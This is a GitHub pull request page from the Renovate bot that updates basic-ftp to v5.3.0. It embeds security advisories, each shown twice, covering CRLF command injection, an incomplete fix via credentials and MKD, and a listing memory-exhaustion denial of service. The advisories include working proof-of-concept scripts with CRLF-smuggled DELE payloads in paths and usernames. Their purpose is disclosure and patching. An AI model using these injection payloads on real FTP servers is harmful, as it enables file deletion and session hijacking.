Skip to content

Update dependency basic-ftp to v5.3.0 [SECURITY]#319

Open
renovate[bot] wants to merge 1 commit intodevelopfrom
renovate/npm-basic-ftp-vulnerability
Open

Update dependency basic-ftp to v5.3.0 [SECURITY]#319
renovate[bot] wants to merge 1 commit intodevelopfrom
renovate/npm-basic-ftp-vulnerability

Conversation

@renovate
Copy link
Copy Markdown
Contributor

@renovate renovate Bot commented Apr 9, 2026
edited
Loading

This PR contains the following updates:

Package Change Age Confidence
basic-ftp 5.2.05.3.0 age confidence

basic-ftp has FTP Command Injection via CRLF

CVE-2026-39983 / GHSA-chqc-8p9q-pq6q

More information

Details

Summary

basic-ftp version 5.2.0 allows FTP command injection via CRLF sequences (\r\n) in file path parameters passed to high-level path APIs such as cd(), remove(), rename(), uploadFrom(), downloadTo(), list(), and removeDir(). The library's protectWhitespace() helper only handles leading spaces and returns other paths unchanged, while FtpContext.send() writes the resulting command string directly to the control socket with \r\n appended. This lets attacker-controlled path strings split one intended FTP command into multiple commands.

Affected product
Product Affected versions Fixed version
basic-ftp (npm) 5.2.0 (confirmed) no fix available as of 2026-04-04
Vulnerability details
  • CWE: CWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection')
  • CVSS 3.1: 8.6 (High)
  • Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L
  • Affected component: dist/Client.js, all path-handling methods via protectWhitespace() and send()

The vulnerability exists because of two interacting code patterns:

1. Inadequate path sanitization in protectWhitespace() (line 677):

async protectWhitespace(path) {
    if (!path.startsWith(" ")) {
        return path;  // No sanitization of \r\n characters
    }
    const pwd = await this.pwd();
    const absolutePathPrefix = pwd.endsWith("/") ? pwd : pwd + "/";
    return absolutePathPrefix + path;
}

This function only handles leading whitespace. It does not strip or reject \r (0x0D) or \n (0x0A) characters anywhere in the path string.

2. Direct socket write in send() (FtpContext.js line 177):

send(command) {
    this._socket.write(command + "\r\n", this.encoding);
}

The send() method appends \r\n to the command and writes directly to the TCP socket. If the command string already contains \r\n sequences (from unsanitized path input), the FTP server interprets them as command delimiters, causing the single intended command to be split into multiple commands.

Affected methods (all call protectWhitespace()send()):

  • cd(path)CWD ${path}
  • remove(path)DELE ${path}
  • list(path)LIST ${path}
  • downloadTo(localPath, remotePath)RETR ${remotePath}
  • uploadFrom(localPath, remotePath)STOR ${remotePath}
  • rename(srcPath, destPath)RNFR ${srcPath} / RNTO ${destPath}
  • removeDir(path)RMD ${path}
Technical impact

An attacker who controls file path parameters can inject arbitrary FTP protocol commands, enabling:

  1. Arbitrary file deletion: Inject DELE /critical-file to delete files on the FTP server
  2. Directory manipulation: Inject MKD or RMD commands to create/remove directories
  3. File exfiltration: Inject RETR commands to trigger downloads of unintended files
  4. Server command execution: On FTP servers supporting SITE EXEC, inject system commands
  5. Session hijacking: Inject USER/PASS commands to re-authenticate as a different user
  6. Service disruption: Inject QUIT to terminate the FTP session unexpectedly

The attack is realistic in applications that accept user input for FTP file paths — for example, web applications that allow users to specify files to download from or upload to an FTP server.

Proof of concept

Prerequisites:

mkdir basic-ftp-poc && cd basic-ftp-poc
npm init -y
npm install basic-ftp@5.2.0

Mock FTP server (ftp-server-mock.js):

const net = require('net');
const server = net.createServer(conn => {
  console.log('[+] Client connected');
  conn.write('220 Mock FTP\r\n');
  let buffer = '';
  conn.on('data', data => {
    buffer += data.toString();
    const lines = buffer.split('\r\n');
    buffer = lines.pop();
    for (const line of lines) {
      if (!line) continue;
      console.log('[CMD] ' + JSON.stringify(line));
      if (line.startsWith('USER')) conn.write('331 OK\r\n');
      else if (line.startsWith('PASS')) conn.write('230 Logged in\r\n');
      else if (line.startsWith('FEAT')) conn.write('211 End\r\n');
      else if (line.startsWith('TYPE')) conn.write('200 OK\r\n');
      else if (line.startsWith('PWD'))  conn.write('257 "/"\r\n');
      else if (line.startsWith('OPTS')) conn.write('200 OK\r\n');
      else if (line.startsWith('STRU')) conn.write('200 OK\r\n');
      else if (line.startsWith('CWD'))  conn.write('250 OK\r\n');
      else if (line.startsWith('DELE')) conn.write('250 Deleted\r\n');
      else if (line.startsWith('QUIT')) { conn.write('221 Bye\r\n'); conn.end(); }
      else conn.write('200 OK\r\n');
    }
  });
});
server.listen(2121, () => console.log('[*] Mock FTP on port 2121'));

Exploit (poc.js):

const ftp = require('basic-ftp');

async function exploit() {
  const client = new ftp.Client();
  client.ftp.verbose = true;
  try {
    await client.access({
      host: '127.0.0.1',
      port: 2121,
      user: 'anonymous',
      password: 'anonymous'
    });

    // Attack 1: Inject DELE command via cd()
    // Intended: CWD harmless.txt
    // Actual:   CWD harmless.txt\r\nDELE /important-file.txt
    const maliciousPath = "harmless.txt\r\nDELE /important-file.txt";
    console.log('\n=== Attack 1: DELE injection via cd() ===');
    try { await client.cd(maliciousPath); } catch(e) {}

    // Attack 2: Double DELE via remove()
    const maliciousPath2 = "decoy.txt\r\nDELE /secret-data.txt";
    console.log('\n=== Attack 2: DELE injection via remove() ===');
    try { await client.remove(maliciousPath2); } catch(e) {}

  } finally {
    client.close();
  }
}
exploit();

Running the PoC:

##### Terminal 1: Start mock FTP server
node ftp-server-mock.js

##### Terminal 2: Run exploit
node poc.js

Expected output on mock server:

"OPTS UTF8 ON"
"USER anonymous"
"PASS anonymous"
"FEAT"
"TYPE I"
"STRU F"
"OPTS UTF8 ON"
"CWD harmless.txt"
"DELE /important-file.txt"   <-- injected from cd()
"DELE decoy.txt"
"DELE /secret-data.txt"      <-- injected from remove()
"QUIT"

This command trace was reproduced against the published basic-ftp@5.2.0
package on Linux with a local mock FTP server. The injected DELE commands are
received as distinct FTP commands, confirming that CRLF inside path parameters
is not neutralized before socket write.

Mitigation

Immediate workaround: Sanitize all path inputs before passing them to basic-ftp:

function sanitizeFtpPath(path) {
  if (/[\r\n]/.test(path)) {
    throw new Error('Invalid FTP path: contains control characters');
  }
  return path;
}

// Usage
await client.cd(sanitizeFtpPath(userInput));

Recommended fix for basic-ftp: The protectWhitespace() function (or a new validation layer) should reject or strip \r and \n characters from all path inputs:

async protectWhitespace(path) {
    // Reject CRLF injection attempts
    if (/[\r\n\0]/.test(path)) {
        throw new Error('Invalid path: contains control characters');
    }
    if (!path.startsWith(" ")) {
        return path;
    }
    const pwd = await this.pwd();
    const absolutePathPrefix = pwd.endsWith("/") ? pwd : pwd + "/";
    return absolutePathPrefix + path;
}
References

Severity

  • CVSS Score: 8.6 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

basic-ftp: Incomplete CRLF Injection Protection Allows Arbitrary FTP Command Execution via Credentials and MKD Commands

GHSA-6v7q-wjvx-w8wg

More information

Details

Summary

basic-ftp's CRLF injection protection (added in commit 2ecc8e2 for GHSA-chqc-8p9q-pq6q) is incomplete. Two code paths bypass the protectWhitespace() control character check: (1) the login() method directly concatenates user-supplied credentials into USER/PASS FTP commands without any validation, and (2) the _openDir() method sends an MKD command before cd() invokes protectWhitespace(), creating a TOCTOU bypass. Both vectors allow an attacker who controls input to inject arbitrary FTP commands into the control connection.

Details
Vector 1: Credential Injection (login)

The login() method constructs FTP commands by direct string concatenation with no CRLF validation:

// src/Client.ts:216-231
login(user = "anonymous", password = "guest"): Promise<FTPResponse> {
    this.ftp.log(`Login security: ${describeTLS(this.ftp.socket)}`)
    return this.ftp.handle("USER " + user, (res, task) => {  // Line 218: no validation on `user`
        // ...
        else if (res.code === 331) {
            this.ftp.send("PASS " + password)  // Line 226: no validation on `password`
        }
    })
}

FtpContext.send() writes directly to the TCP socket:

// src/FtpContext.ts:223-227
send(command: string) {
    // ...
    this._socket.write(command + "\r\n", this.encoding)
}

The protectWhitespace() method (line 762) rejects \r, \n, and \0 characters — but it is only called for path-based operations. Credentials never pass through it.

The public access() method (line 268) passes options.user and options.password directly to login() with no sanitization.

Vector 2: MKD TOCTOU Bypass (_openDir)

The _openDir() method sends an MKD command before the CRLF check in cd():

// src/Client.ts:745-748
protected async _openDir(dirName: string) {
    await this.sendIgnoringError("MKD " + dirName)  // Line 746: sent BEFORE validation
    await this.cd(dirName)                           // Line 747: protectWhitespace() called here — too late
}

This is called from ensureDir() (line 729) which splits a user-supplied remote path by / and passes each fragment to _openDir(), and from _uploadToWorkingDir() (line 679) which passes local directory names read from the filesystem.

PoC
Vector 1: Credential Injection
const ftp = require("basic-ftp");

async function exploit() {
    const client = new ftp.Client();
    client.ftp.verbose = true;

    // Connect to target FTP server
    await client.access({
        host: "target-ftp-server",
        port: 21,
        // Username contains CRLF + injected DELE command
        user: "anonymous\r\nDELE important.txt",
        password: "guest"
    });
    // Server receives on the wire:
    //   USER anonymous\r\n
    //   DELE important.txt\r\n
    //   PASS guest\r\n
    // The DELE command executes before PASS is processed

    client.close();
}

exploit();
Vector 2: MKD TOCTOU Bypass
const ftp = require("basic-ftp");

async function exploit() {
    const client = new ftp.Client();
    client.ftp.verbose = true;

    await client.access({
        host: "target-ftp-server",
        user: "anonymous",
        password: "guest"
    });

    // Path fragment with CRLF — MKD is sent before cd() validates
    try {
        await client.ensureDir("test\r\nDELE important.txt/subdir");
    } catch (e) {
        // cd() throws after protectWhitespace() rejects, but MKD + DELE already sent
    }
    // Server received:
    //   MKD test\r\n
    //   DELE important.txt\r\n
    //   CWD test\r\n  <-- this may fail, but damage is done

    client.close();
}

exploit();
Impact

An attacker who controls credentials or remote paths passed to basic-ftp can inject arbitrary FTP commands into the control connection. This enables:

  • File deletion: Inject DELE commands to remove files on the FTP server
  • File manipulation: Inject RNFR/RNTO to rename files, MKD/RMD to create/remove directories
  • Server commands: Inject SITE commands (e.g., SITE CHMOD) to change permissions
  • Session hijacking: Inject USER/PASS to re-authenticate as a different user

The credential injection vector (Vector 1) is particularly dangerous because it occurs before authentication, meaning the injected commands execute with whatever default permissions the server grants during the login handshake.

Applications that accept user-supplied FTP credentials (e.g., web-based file managers, backup tools, deployment systems) are directly vulnerable.

Recommended Fix

Add CRLF validation to both code paths:

1. Validate credentials in login():

// src/Client.ts:216
login(user = "anonymous", password = "guest"): Promise<FTPResponse> {
    if (/[\r\n\0]/.test(user) || /[\r\n\0]/.test(password)) {
        return Promise.reject(new Error("Invalid credentials: Contains control characters"));
    }
    this.ftp.log(`Login security: ${describeTLS(this.ftp.socket)}`)
    return this.ftp.handle("USER " + user, (res, task) => {
        // ... rest unchanged
    })
}

2. Validate dirName in _openDir() before sending MKD:

// src/Client.ts:745
protected async _openDir(dirName: string) {
    if (/[\r\n\0]/.test(dirName)) {
        throw new Error("Invalid path: Contains control characters");
    }
    await this.sendIgnoringError("MKD " + dirName)
    await this.cd(dirName)
}

Alternatively, centralize CRLF validation in FtpContext.send() so that all FTP commands are protected regardless of the calling code path.

Severity

  • CVSS Score: 8.2 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

basic-ftp vulnerable to denial of service via unbounded memory consumption in Client.list()

CVE-2026-41324 / GHSA-rp42-5vxx-qpwr

More information

Details

Summary

basic-ftp@5.2.2 is vulnerable to denial of service through unbounded memory growth while processing directory listings from a remote FTP server. A malicious or compromised server can send an extremely large or never-ending listing response to Client.list(), causing the client process to consume memory until it becomes unstable or crashes.

Details

The issue is in the package's default directory listing flow.

Client.list() reaches dist/Client.js, where the full listing response is downloaded into a StringWriter before parsing:

File: dist/Client.js:516-527

async _requestListWithCommand(command) {
    const buffer = new StringWriter_1.StringWriter();
    await (0, transfer_1.downloadTo)(buffer, {
        ftp: this.ftp,
        tracker: this._progressTracker,
        command,
        remotePath: "",
        type: "list"
    });
    const text = buffer.getText(this.ftp.encoding);
    this.ftp.log(text);
    return this.parseList(text);
}

The vulnerable sink is StringWriter, which grows an in-memory Buffer with no limit:

File: dist/StringWriter.js:5-20

class StringWriter extends stream_1.Writable {
    constructor() {
        super(...arguments);
        this.buf = Buffer.alloc(0);
    }
    _write(chunk, _, callback) {
        if (chunk instanceof Buffer) {
            this.buf = Buffer.concat([this.buf, chunk]);
            callback(null);
        }
        else {
            callback(new Error("StringWriter expects chunks of type 'Buffer'."));
        }
    }
    getText(encoding) {
        return this.buf.toString(encoding);
    }
}

The critical operation is:

this.buf = Buffer.concat([this.buf, chunk]);

There is no maximum size check, no truncation, and no streaming parser. Because the remote FTP server controls the listing response, it can force the client to keep allocating memory until the process is terminated.

How it happens:

  1. An application connects to an attacker-controlled or compromised FTP server.
  2. The application calls client.list().
  3. The server returns an extremely large or unbounded directory listing.
  4. basic-ftp buffers the full response in StringWriter.
  5. Memory grows without bound due to repeated Buffer.concat(...) calls.
PoC

The following PoC exercises the vulnerable buffering primitive directly:

const { StringWriter } = require("basic-ftp/dist/StringWriter.js");

function mb(n) {
  return Math.round(n / 1024 / 1024) + "MB";
}

const writer = new StringWriter();
let wrote = 0;

for (let i = 0; i < 32; i++) {
  const chunk = Buffer.alloc(4 * 1024 * 1024, 0x41);
  writer.write(chunk);
  wrote += chunk.length;

  if ((i + 1) % 8 === 0) {
    const m = process.memoryUsage();
    console.log("written", mb(wrote), "rss", mb(m.rss), "heap", mb(m.heapUsed), "buf", mb(m.arrayBuffers));
  }
}

console.log("final text len", writer.getText("utf8").length);

Observed output:

written 32MB rss 116MB heap 4MB buf 64MB
written 64MB rss 296MB heap 4MB buf 240MB
written 96MB rss 340MB heap 3MB buf 284MB
written 128MB rss 436MB heap 3MB buf 376MB
final text len 134217728

This demonstrates sustained memory growth in the same code path used to buffer directory listing data.

Supporting files saved alongside this report:

  • poc.js
  • poc_output.txt
Impact

This is a denial-of-service vulnerability affecting applications that use basic-ftp to list directories from remote FTP servers.

  • Vulnerability class: Memory exhaustion / Denial of Service
  • Attack precondition: The victim connects to a malicious or compromised FTP server and performs Client.list()
  • Impacted users: Any application or service using basic-ftp@5.2.2 against untrusted FTP endpoints
  • Security effect: The attacker can cause excessive memory consumption, process instability, and potential process termination

Recommended remediation:

  1. Enforce a maximum listing size.
  2. Abort transfers that exceed the configured limit.
  3. Prefer incremental or streaming parsing over full-response buffering.

Example defensive check:

if (this.buf.length + chunk.length > MAX_LISTING_BYTES) {
    callback(new Error("FTP listing exceeds maximum allowed size."));
    return;
}
this.buf = Buffer.concat([this.buf, chunk]);

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

basic-ftp has FTP Command Injection via CRLF

CVE-2026-39983 / GHSA-chqc-8p9q-pq6q

More information

Details

Summary

basic-ftp version 5.2.0 allows FTP command injection via CRLF sequences (\r\n) in file path parameters passed to high-level path APIs such as cd(), remove(), rename(), uploadFrom(), downloadTo(), list(), and removeDir(). The library's protectWhitespace() helper only handles leading spaces and returns other paths unchanged, while FtpContext.send() writes the resulting command string directly to the control socket with \r\n appended. This lets attacker-controlled path strings split one intended FTP command into multiple commands.

Affected product
Product Affected versions Fixed version
basic-ftp (npm) 5.2.0 (confirmed) no fix available as of 2026-04-04
Vulnerability details
  • CWE: CWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection')
  • CVSS 3.1: 8.6 (High)
  • Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L
  • Affected component: dist/Client.js, all path-handling methods via protectWhitespace() and send()

The vulnerability exists because of two interacting code patterns:

1. Inadequate path sanitization in protectWhitespace() (line 677):

async protectWhitespace(path) {
    if (!path.startsWith(" ")) {
        return path;  // No sanitization of \r\n characters
    }
    const pwd = await this.pwd();
    const absolutePathPrefix = pwd.endsWith("/") ? pwd : pwd + "/";
    return absolutePathPrefix + path;
}

This function only handles leading whitespace. It does not strip or reject \r (0x0D) or \n (0x0A) characters anywhere in the path string.

2. Direct socket write in send() (FtpContext.js line 177):

send(command) {
    this._socket.write(command + "\r\n", this.encoding);
}

The send() method appends \r\n to the command and writes directly to the TCP socket. If the command string already contains \r\n sequences (from unsanitized path input), the FTP server interprets them as command delimiters, causing the single intended command to be split into multiple commands.

Affected methods (all call protectWhitespace()send()):

  • cd(path)CWD ${path}
  • remove(path)DELE ${path}
  • list(path)LIST ${path}
  • downloadTo(localPath, remotePath)RETR ${remotePath}
  • uploadFrom(localPath, remotePath)STOR ${remotePath}
  • rename(srcPath, destPath)RNFR ${srcPath} / RNTO ${destPath}
  • removeDir(path)RMD ${path}
Technical impact

An attacker who controls file path parameters can inject arbitrary FTP protocol commands, enabling:

  1. Arbitrary file deletion: Inject DELE /critical-file to delete files on the FTP server
  2. Directory manipulation: Inject MKD or RMD commands to create/remove directories
  3. File exfiltration: Inject RETR commands to trigger downloads of unintended files
  4. Server command execution: On FTP servers supporting SITE EXEC, inject system commands
  5. Session hijacking: Inject USER/PASS commands to re-authenticate as a different user
  6. Service disruption: Inject QUIT to terminate the FTP session unexpectedly

The attack is realistic in applications that accept user input for FTP file paths — for example, web applications that allow users to specify files to download from or upload to an FTP server.

Proof of concept

Prerequisites:

mkdir basic-ftp-poc && cd basic-ftp-poc
npm init -y
npm install basic-ftp@5.2.0

Mock FTP server (ftp-server-mock.js):

const net = require('net');
const server = net.createServer(conn => {
  console.log('[+] Client connected');
  conn.write('220 Mock FTP\r\n');
  let buffer = '';
  conn.on('data', data => {
    buffer += data.toString();
    const lines = buffer.split('\r\n');
    buffer = lines.pop();
    for (const line of lines) {
      if (!line) continue;
      console.log('[CMD] ' + JSON.stringify(line));
      if (line.startsWith('USER')) conn.write('331 OK\r\n');
      else if (line.startsWith('PASS')) conn.write('230 Logged in\r\n');
      else if (line.startsWith('FEAT')) conn.write('211 End\r\n');
      else if (line.startsWith('TYPE')) conn.write('200 OK\r\n');
      else if (line.startsWith('PWD'))  conn.write('257 "/"\r\n');
      else if (line.startsWith('OPTS')) conn.write('200 OK\r\n');
      else if (line.startsWith('STRU')) conn.write('200 OK\r\n');
      else if (line.startsWith('CWD'))  conn.write('250 OK\r\n');
      else if (line.startsWith('DELE')) conn.write('250 Deleted\r\n');
      else if (line.startsWith('QUIT')) { conn.write('221 Bye\r\n'); conn.end(); }
      else conn.write('200 OK\r\n');
    }
  });
});
server.listen(2121, () => console.log('[*] Mock FTP on port 2121'));

Exploit (poc.js):

const ftp = require('basic-ftp');

async function exploit() {
  const client = new ftp.Client();
  client.ftp.verbose = true;
  try {
    await client.access({
      host: '127.0.0.1',
      port: 2121,
      user: 'anonymous',
      password: 'anonymous'
    });

    // Attack 1: Inject DELE command via cd()
    // Intended: CWD harmless.txt
    // Actual:   CWD harmless.txt\r\nDELE /important-file.txt
    const maliciousPath = "harmless.txt\r\nDELE /important-file.txt";
    console.log('\n=== Attack 1: DELE injection via cd() ===');
    try { await client.cd(maliciousPath); } catch(e) {}

    // Attack 2: Double DELE via remove()
    const maliciousPath2 = "decoy.txt\r\nDELE /secret-data.txt";
    console.log('\n=== Attack 2: DELE injection via remove() ===');
    try { await client.remove(maliciousPath2); } catch(e) {}

  } finally {
    client.close();
  }
}
exploit();

Running the PoC:

##### Terminal 1: Start mock FTP server
node ftp-server-mock.js

##### Terminal 2: Run exploit
node poc.js

Expected output on mock server:

"OPTS UTF8 ON"
"USER anonymous"
"PASS anonymous"
"FEAT"
"TYPE I"
"STRU F"
"OPTS UTF8 ON"
"CWD harmless.txt"
"DELE /important-file.txt"   <-- injected from cd()
"DELE decoy.txt"
"DELE /secret-data.txt"      <-- injected from remove()
"QUIT"

This command trace was reproduced against the published basic-ftp@5.2.0
package on Linux with a local mock FTP server. The injected DELE commands are
received as distinct FTP commands, confirming that CRLF inside path parameters
is not neutralized before socket write.

Mitigation

Immediate workaround: Sanitize all path inputs before passing them to basic-ftp:

function sanitizeFtpPath(path) {
  if (/[\r\n]/.test(path)) {
    throw new Error('Invalid FTP path: contains control characters');
  }
  return path;
}

// Usage
await client.cd(sanitizeFtpPath(userInput));

Recommended fix for basic-ftp: The protectWhitespace() function (or a new validation layer) should reject or strip \r and \n characters from all path inputs:

async protectWhitespace(path) {
    // Reject CRLF injection attempts
    if (/[\r\n\0]/.test(path)) {
        throw new Error('Invalid path: contains control characters');
    }
    if (!path.startsWith(" ")) {
        return path;
    }
    const pwd = await this.pwd();
    const absolutePathPrefix = pwd.endsWith("/") ? pwd : pwd + "/";
    return absolutePathPrefix + path;
}
References

Severity

  • CVSS Score: 8.6 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

basic-ftp: Incomplete CRLF Injection Protection Allows Arbitrary FTP Command Execution via Credentials and MKD Commands

GHSA-6v7q-wjvx-w8wg

More information

Details

Summary

basic-ftp's CRLF injection protection (added in commit 2ecc8e2 for GHSA-chqc-8p9q-pq6q) is incomplete. Two code paths bypass the protectWhitespace() control character check: (1) the login() method directly concatenates user-supplied credentials into USER/PASS FTP commands without any validation, and (2) the _openDir() method sends an MKD command before cd() invokes protectWhitespace(), creating a TOCTOU bypass. Both vectors allow an attacker who controls input to inject arbitrary FTP commands into the control connection.

Details
Vector 1: Credential Injection (login)

The login() method constructs FTP commands by direct string concatenation with no CRLF validation:

// src/Client.ts:216-231
login(user = "anonymous", password = "guest"): Promise<FTPResponse> {
    this.ftp.log(`Login security: ${describeTLS(this.ftp.socket)}`)
    return this.ftp.handle("USER " + user, (res, task) => {  // Line 218: no validation on `user`
        // ...
        else if (res.code === 331) {
            this.ftp.send("PASS " + password)  // Line 226: no validation on `password`
        }
    })
}

FtpContext.send() writes directly to the TCP socket:

// src/FtpContext.ts:223-227
send(command: string) {
    // ...
    this._socket.write(command + "\r\n", this.encoding)
}

The protectWhitespace() method (line 762) rejects \r, \n, and \0 characters — but it is only called for path-based operations. Credentials never pass through it.

The public access() method (line 268) passes options.user and options.password directly to login() with no sanitization.

Vector 2: MKD TOCTOU Bypass (_openDir)

The _openDir() method sends an MKD command before the CRLF check in cd():

// src/Client.ts:745-748
protected async _openDir(dirName: string) {
    await this.sendIgnoringError("MKD " + dirName)  // Line 746: sent BEFORE validation
    await this.cd(dirName)                           // Line 747: protectWhitespace() called here — too late
}

This is called from ensureDir() (line 729) which splits a user-supplied remote path by / and passes each fragment to _openDir(), and from _uploadToWorkingDir() (line 679) which passes local directory names read from the filesystem.

PoC
Vector 1: Credential Injection
const ftp = require("basic-ftp");

async function exploit() {
    const client = new ftp.Client();
    client.ftp.verbose = true;

    // Connect to target FTP server
    await client.access({
        host: "target-ftp-server",
        port: 21,
        // Username contains CRLF + injected DELE command
        user: "anonymous\r\nDELE important.txt",
        password: "guest"
    });
    // Server receives on the wire:
    //   USER anonymous\r\n
    //   DELE important.txt\r\n
    //   PASS guest\r\n
    // The DELE command executes before PASS is processed

    client.close();
}

exploit();
Vector 2: MKD TOCTOU Bypass
const ftp = require("basic-ftp");

async function exploit() {
    const client = new ftp.Client();
    client.ftp.verbose = true;

    await client.access({
        host: "target-ftp-server",
        user: "anonymous",
        password: "guest"
    });

    // Path fragment with CRLF — MKD is sent before cd() validates
    try {
        await client.ensureDir("test\r\nDELE important.txt/subdir");
    } catch (e) {
        // cd() throws after protectWhitespace() rejects, but MKD + DELE already sent
    }
    // Server received:
    //   MKD test\r\n
    //   DELE important.txt\r\n
    //   CWD test\r\n  <-- this may fail, but damage is done

    client.close();
}

exploit();
Impact

An attacker who controls credentials or remote paths passed to basic-ftp can inject arbitrary FTP commands into the control connection. This enables:

  • File deletion: Inject DELE commands to remove files on the FTP server
  • File manipulation: Inject RNFR/RNTO to rename files, MKD/RMD to create/remove directories
  • Server commands: Inject SITE commands (e.g., SITE CHMOD) to change permissions
  • Session hijacking: Inject USER/PASS to re-authenticate as a different user

The credential injection vector (Vector 1) is particularly dangerous because it occurs before authentication, meaning the injected commands execute with whatever default permissions the server grants during the login handshake.

Applications that accept user-supplied FTP credentials (e.g., web-based file managers, backup tools, deployment systems) are directly vulnerable.

Recommended Fix

Add CRLF validation to both code paths:

1. Validate credentials in login():

// src/Client.ts:216
login(user = "anonymous", password = "guest"): Promise<FTPResponse> {
    if (/[\r\n\0]/.test(user) || /[\r\n\0]/.test(password)) {
        return Promise.reject(new Error("Invalid credentials: Contains control characters"));
    }
    this.ftp.log(`Login security: ${describeTLS(this.ftp.socket)}`)
    return this.ftp.handle("USER " + user, (res, task) => {
        // ... rest unchanged
    })
}

2. Validate dirName in _openDir() before sending MKD:

// src/Client.ts:745
protected async _openDir(dirName: string) {
    if (/[\r\n\0]/.test(dirName)) {
        throw new Error("Invalid path: Contains control characters");
    }
    await this.sendIgnoringError("MKD " + dirName)
    await this.cd(dirName)
}

Alternatively, centralize CRLF validation in FtpContext.send() so that all FTP commands are protected regardless of the calling code path.

Severity

  • CVSS Score: 8.2 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

basic-ftp vulnerable to denial of service via unbounded memory consumption in Client.list()

GHSA-rp42-5vxx-qpwr

More information

Details

Summary

basic-ftp@5.2.2 is vulnerable to denial of service through unbounded memory growth while processing directory listings from a remote FTP server. A malicious or compromised server can send an extremely large or never-ending listing response to Client.list(), causing the client process to consume memory until it becomes unstable or crashes.

Details

The issue is in the package's default directory listing flow.

Client.list() reaches dist/Client.js, where the full listing response is downloaded into a StringWriter before parsing:

File: dist/Client.js:516-527

async _requestListWithCommand(command) {
    const buffer = new StringWriter_1.StringWriter();
    await (0, transfer_1.downloadTo)(buffer, {
        ftp: this.ftp,
        tracker: this._progressTracker,
        command,
        remotePath: "",
        type: "list"
    });
    const text = buffer.getText(this.ftp.encoding);
    this.ftp.log(text);
    return this.parseList(text);
}

The vulnerable sink is StringWriter, which grows an in-memory Buffer with no limit:

File: dist/StringWriter.js:5-20

class StringWriter extends stream_1.Writable {
    constructor() {
        super(...arguments);
        this.buf = Buffer.alloc(0);
    }
    _write(chunk, _, callback) {
        if (chunk instanceof Buffer) {
            this.buf = Buffer.concat([this.buf, chunk]);
            callback(null);
        }
        else {
            callback(new Error("StringWriter expects chunks of type 'Buffer'."));
        }
    }
    getText(encoding) {
        return this.buf.toString(encoding);
    }
}

The critical operation is:

this.buf = Buffer.concat([this.buf, chunk]);

There is no maximum size check, no truncation, and no streaming parser. Because the remote FTP server controls the listing response, it can force the client to keep allocating memory until the process is terminated.

How it happens:

  1. An application connects to an attacker-controlled or compromised FTP server.
  2. The application calls client.list().
  3. The server returns an extremely large or unbounded directory listing.
  4. basic-ftp buffers the full response in StringWriter.
  5. Memory grows without bound due to repeated Buffer.concat(...) calls.
PoC

The following PoC exercises the vulnerable buffering primitive directly:

const { StringWriter } = require("basic-ftp/dist/StringWriter.js");

function mb(n) {
  return Math.round(n / 1024 / 1024) + "MB";
}

const writer = new StringWriter();
let wrote = 0;

for (let i = 0; i < 32; i++) {
  const chunk = Buffer.alloc(4 * 1024 * 1024, 0x41);
  writer.write(chunk);
  wrote += chunk.length;

  if ((i + 1) % 8 === 0) {
    const m = process.memoryUsage();
    console.log("written", mb(wrote), "rss", mb(m.rss), "heap", mb(m.heapUsed), "buf", mb(m.arrayBuffers));
  }
}

console.log("final text len", writer.getText("utf8").length);

Observed output:

written 32MB rss 116MB heap 4MB buf 64MB
written 64MB rss 296MB heap 4MB buf 240MB
written 96MB rss 340MB heap 3MB buf 284MB
written 128MB rss 436MB heap 3MB buf 376MB
final text len 134217728

This demonstrates sustained memory growth in the same code path used to buffer directory listing data.

Supporting files saved alongside this report:

  • poc.js
  • poc_output.txt
Impact

This is a denial-of-service vulnerability affecting applications that use basic-ftp to list directories from remote FTP servers.

  • Vulnerability class: Memory exhaustion / Denial of Service
  • Attack precondition: The victim connects to a malicious or compromised FTP server and performs Client.list()
  • Impacted users: Any application or service using basic-ftp@5.2.2 against untrusted FTP endpoints
  • Security effect: The attacker can cause excessive memory consumption, process instability, and potential process termination

Recommended remediation:

  1. Enforce a maximum listing size.
  2. Abort transfers that exceed the configured limit.
  3. Prefer incremental or streaming parsing over full-response buffering.

Example defensive check:

if (this.buf.length + chunk.length > MAX_LISTING_BYTES) {
    callback(new Error("FTP listing exceeds maximum allowed size."));
    return;
}
this.buf = Buffer.concat([this.buf, chunk]);

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

Release Notes

patrickjuchli/basic-ftp (basic-ftp)

v5.3.0

Compare Source

  • Changed: Introduced an upper bound for total bytes of directory listing, fixes GHSA-rp42-5vxx-qpwr.
  • Added: Option to increase the upper bound for total bytes of directory listing in Client constructor.

v5.2.2

Compare Source

v5.2.1

Compare Source

Configuration

📅 Schedule: (UTC)

  • Branch creation
    • ""
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@github-actions
Copy link
Copy Markdown

github-actions Bot commented Apr 9, 2026

Coverage report

This PR does not seem to contain any modification to coverable code.

@renovate renovate Bot force-pushed the renovate/npm-basic-ftp-vulnerability branch from 80ab5a1 to cdab592 Compare April 11, 2026 00:51
@renovate renovate Bot changed the title Update dependency basic-ftp to v5.2.1 [SECURITY] Update dependency basic-ftp to v5.2.2 [SECURITY] Apr 11, 2026
